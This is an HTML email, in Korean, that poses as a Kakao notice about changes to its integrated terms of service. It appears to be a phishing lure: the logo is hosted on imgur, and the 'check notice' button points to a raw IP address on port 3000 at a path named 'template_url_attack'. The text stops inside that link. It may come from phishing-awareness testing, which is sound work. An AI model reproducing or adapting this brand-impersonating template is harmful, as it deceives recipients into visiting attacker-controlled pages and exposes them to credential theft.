<html>
    <head><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <title></title></head>

 
        <!--적용시 삭제-->
        <table width="100%" align="center" style="border-collapse: collapse;" bgcolor="#efeff0" border="0" cellspacing="0" cellpadding="0">
            <tbody>
                <tr>
                    <td>
                        <!--[if (gte mso 9)|(IE)]>
<table align="center" width="640" cellspacing="0" cellpadding="0" border="0" bgcolor="#ffffff" style="max-width:640px;margin:0 auto">
<tbody><tr><td>
<![endif]-->
                        <table width="100%" align="center" style="margin: 0px auto; max-width: 640px;" bgcolor="#ffffff" border="0" cellspacing="0" cellpadding="0">
                            <tbody>
                                <tr>
                                    <td width="100%" height="47" bgcolor="#fae100" colspan="3"></td>
                                </tr>
                                <tr>
                                    <td width="6%" height="25" bgcolor="#fae100"></td>
                                    <td width="88%" height="25" bgcolor="#fae100"><img width="210" height="27" style="display: block;" alt="kakao 계정" src="https://i.imgur.com/7Y6pab3.png" border="0"></td>
                                    <td width="6%" height="25" bgcolor="#fae100"></td>
                                </tr>
                                <tr>
                                    <td width="100%" height="46" bgcolor="#fae100" colspan="3"></td>
                                </tr>
                                <tr>
                                    <td width="100%" height="35" colspan="3"></td>
                                </tr>
                                <tr>
                                    <td width="6%"></td>
                                    <td width="88%" style='color: rgb(30, 30, 30); line-height: 22px; letter-spacing: -1px; font-family: "맑은고딕",Malgun Gothic,Apple SD Gothic Neo,sans-serif,"굴림",gulim; font-size: 18px; font-weight: bold;'>카카오 통합 약관 및 서비스 약관 변경 안내</td>
                                    <td width="6%"></td>
                                </tr>
                                <tr>
                                    <td width="100%" height="25" colspan="3"></td>
                                </tr>
                                <tr>
                                    <td width="6%"></td>
                                    <td width="88%" style='color: rgb(30, 30, 30); line-height: 22px; letter-spacing: -1px; font-family: "맑은고딕",Malgun Gothic,Apple SD Gothic Neo,sans-serif,"굴림",gulim; font-size: 14px;'>안녕하세요. 카카오입니다.</td>
                                    <td width="6%"></td>
                                </tr>
                                <tr>
                                    <td width="100%" height="14" colspan="3"></td>
                                </tr>
                                <tr>
                                    <td width="6%"></td>
                                    <td width="88%" style='color: rgb(30, 30, 30); line-height: 22px; letter-spacing: -1px; font-family: "맑은고딕",Malgun Gothic,Apple SD Gothic Neo,sans-serif,"굴림",gulim; font-size: 14px;'>카카오 서비스를 이용해 주시는 회원 여러분께 감사 드립니다.</td>
                                    <td width="6%"></td>
                                </tr>
                                <tr>
                                    <td width="100%" height="14" colspan="3"></td>
                                </tr>
                                <tr>
                                    <td width="6%"></td>
                                    <td width="88%" style='color: rgb(30, 30, 30); line-height: 22px; letter-spacing: -1px; font-family: "맑은고딕",Malgun Gothic,Apple SD Gothic Neo,sans-serif,"굴림",gulim; font-size: 14px;'>카카오 통합 약관 및 카카오 서비스 약관이 아래와 같이 변경될 예정임을 안내드립니다.</td>
                                    <td width="6%"></td>
                                </tr>
                                <tr>
                                    <td width="100%" height="14" colspan="3"></td>
                                </tr>
                                <tr>
                                    <td width="6%"></td>
                                    <td width="88%">
                                        <table width="100%" style='color: rgb(30, 30, 30); line-height: 22px; letter-spacing: -1px; font-family: "맑은고딕",Malgun Gothic,Apple SD Gothic Neo,sans-serif,"굴림",gulim;' bgcolor="#f8f8f8" border="0" cellspacing="0" cellpadding="0">
                                            <tbody>
                                                <tr>
                                                    <td width="100%" height="13" colspan="4"></td>
                                                </tr>
                                                <tr>
                                                    <td width="3%"></td>
                                                    <td width="2%" valign="top" style="line-height: 18px; font-size: 14px; font-weight: bold;">1.</td>
                                                    <td width="92%" style="line-height: 18px; font-size: 14px; font-weight: bold;"> 변경 내용</td>
                                                    <td width="3%"></td>
                                                </tr>
                                                <tr>
                                                    <td width="100%" height="2" colspan="4"></td>
                                                </tr>
                                                <tr>
                                                    <td width="3%"></td>
                                                    <td width="2%" valign="top" style="font-size: 14px;">ㆍ</td>
                                                    <td width="92%" valign="top" style="line-height: 18px; font-size: 14px;">전자게시판 서비스를 이용한 상거래 시, 소비자 보호를 위해 관련 법률에서 규정한 판매자와 전자게시판 서비스 제공자의 책임과 의무를 명확히 하기 위함</td>
                                                    <td width="3%"></td>
                                                </tr>
                                                <tr>
                                                    <td width="100%" height="9" colspan="4"></td>
                                                </tr>
                                                <tr>
                                                    <td width="3%"></td>
                                                    <td width="2%" valign="top" style="line-height: 18px; font-size: 14px; font-weight: bold;">2.</td>
                                                    <td width="92%" valign="top" style="line-height: 18px; font-size: 14px; font-weight: bold;">약관 적용일</td>
                                                    <td width="3%"></td>
                                                </tr>
                                                <tr>
                                                    <td width="100%" height="2" colspan="4"></td>
                                                </tr>
                                                <tr>
                                                    <td width="3%"></td>
                                                    <td width="2%" valign="top" style="font-size: 14px;">ㆍ</td>
                                                    <td width="92%" valign="top" style="line-height: 18px; font-size: 14px;"><strong>2018년 10월 30일</strong></td>
                                                    <td width="3%"></td>
                                                </tr>
                                                <tr>
                                                    <td width="100%" height="9" colspan="4"></td>
                                                </tr>
                                            </tbody>
                                        </table>
                                    </td>
                                    <td width="6%"></td>
                                </tr>
                                <tr>
                                    <td width="6%"></td>
                                    <td width="88%" style='color: rgb(30, 30, 30); line-height: 22px; letter-spacing: -1px; font-family: "맑은고딕",Malgun Gothic,Apple SD Gothic Neo,sans-serif,"굴림",gulim; font-size: 14px;'><br>약관의 자세한 변경 내용은 아래 <strong>[카카오 공지사항 확인하기]</strong> 버튼을 클릭하여 확인할 수 있습니다.</td>
                                    <td width="6%"></td>
                                </tr>
                                
                                <tr>
                                    <td width="100%" height="20" colspan="3"></td>
                                </tr>
                                <tr>
                                    <td width="6%" height="34"></td>
                                    <td width="88%" height="34">
                                        <table width="100%" style='color: rgb(30, 30, 30); line-height: 22px; letter-spacing: -1px; font-family: "맑은고딕",Malgun Gothic,Apple SD Gothic Neo,sans-serif,"굴림",gulim;' border="0" cellspacing="0" cellpadding="0">
                                            <tbody>
                                                <tr>
                                                    <td width="31%" height="34"></td>
                                                    <td width="38%" height="34" align="center" style="border-radius: 4px; font-size: 14px; min-width: 210px;" bgcolor="#5066aa">
                                                        <a style="color: rgb(255, 255, 255); text-decoration: none; display: block; line-: 34px;" href="http://58.141.234.59:3000/template_url_attack/ 